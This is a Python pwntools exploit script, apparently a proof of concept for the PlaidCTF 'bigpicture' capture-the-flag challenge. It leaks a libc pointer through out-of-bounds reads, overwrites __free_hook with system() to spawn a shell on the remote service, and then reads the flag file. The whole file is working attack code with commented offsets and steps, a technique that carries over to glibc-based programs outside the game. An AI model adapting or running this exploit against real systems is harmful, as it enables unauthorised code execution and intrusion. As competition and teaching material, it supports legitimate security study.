from pwn import *
import struct
# Grid dimensions sent to the challenge right after connecting.
WIDTH = 1
HEIGHT = 1000000
# Selects the local binary or the remote service; the two targets use
# different offsets, so both are kept and picked here.
LOCAL = False
# (index of __free_hook, index of the pointer leaked to locate libc) as
# passed to write()/read() below -- negative, i.e. before the buffer start.
FREE_HOOK_OFFSET, LIBC_LEAK = (
    (-1230952, -1241056) if LOCAL else (-1214568, -1224672)
)
# Write a 8 byte value to the provided address
def write(target, val):
    """Store ``val`` as eight little-endian bytes starting at index ``target``.

    One ``-0, <index>, <char>`` line is sent per byte over the global
    connection ``p``; byte ``i`` of ``val`` lands at ``target + i``.
    Only the low 64 bits of ``val`` are written.
    """
    for offset in range(8):
        byte = (val >> (offset * 8)) & 0xFF
        line = "-0, %d, %c" % (target + offset, chr(byte))
        p.sendlineafter('>', line)
# Leak data via the 'overwriting' message
def read(target, count):
    """Leak ``count`` bytes at index ``target`` and return them as one int.

    Each byte is requested with a ``-0, <index>, A`` line and taken from
    the single character that follows ``'overwriting '`` in the reply.
    Indices are walked from ``target + count - 1`` down to ``target`` and
    each byte is shifted in above the previous ones, so the result is the
    little-endian integer stored at ``target``.
    """
    value = 0
    for step in range(count):
        index = target + count - 1 - step
        p.sendlineafter('>', "-0, %d, A" % index)
        p.recvuntil('overwriting ')
        leaked = ord(p.recv(1))
        value = (value << 8) | leaked
    return value
# Script body (Python 2: uses print statements). Loads the challenge's libc
# so symbol addresses can be rebased once the leak below gives the base.
libc = ELF('./libc-2.23.so')
print 'PlaidCTF bigpicture POC... by @_xpn_'
# LOCAL (set at the top of the file) picks a local process or the remote
# service; the offsets used below were chosen to match.
if LOCAL:
    p = process('./bigpicture')
else:
    p = remote('bigpicture.chal.pwning.xxx', 420)
print '[/] Sending our size of %d x %d' % (WIDTH, HEIGHT)
p.sendline(str(WIDTH) + ' x ' + str(HEIGHT))
print '[/] Attempting to leak pointer from LibC'
# read() combines the 6 leaked bytes into one little-endian integer.
data = read(LIBC_LEAK, 6)
print '[/] Pointer leaked as %x' % (data)
# 129030 is the fixed distance from the leaked pointer to the libc base;
# the same constant is reused on the next assignment.
print "[/] LibC base address calculated as: %x" % (data - 129030)
# Update our local libc memory address
# Rebasing the ELF object makes libc.symbols[...] return runtime addresses.
libc.address = data - 129030
print "[/] system() address %x " % (libc.symbols['system'])
print "[/] Writing 'sh' to memory"
# write() stores 8 bytes per call, so index 0 receives 's' followed by
# seven zero bytes, then index 1 is overwritten with 'h'.
write(0, ord('s'))
write(1, ord('h'))
print "[/] Setting __free_hook() -> system()"
write(FREE_HOOK_OFFSET, libc.symbols['system'])
print "[/] All done, hopefully we have a shell!"
# NOTE(review): 'quit' is presumably what triggers the free() that reaches
# the hook -- not visible here, confirm against the challenge binary.
p.sendlineafter('>','quit')
p.sendline('ls -alF /home/bigpicture/' )
p.sendline('cat /home/bigpicture/flag' )
# Echo everything the remote side sends; the loop only ends when recv()
# raises (e.g. on EOF once the connection closes).
while True:
    print p.recv()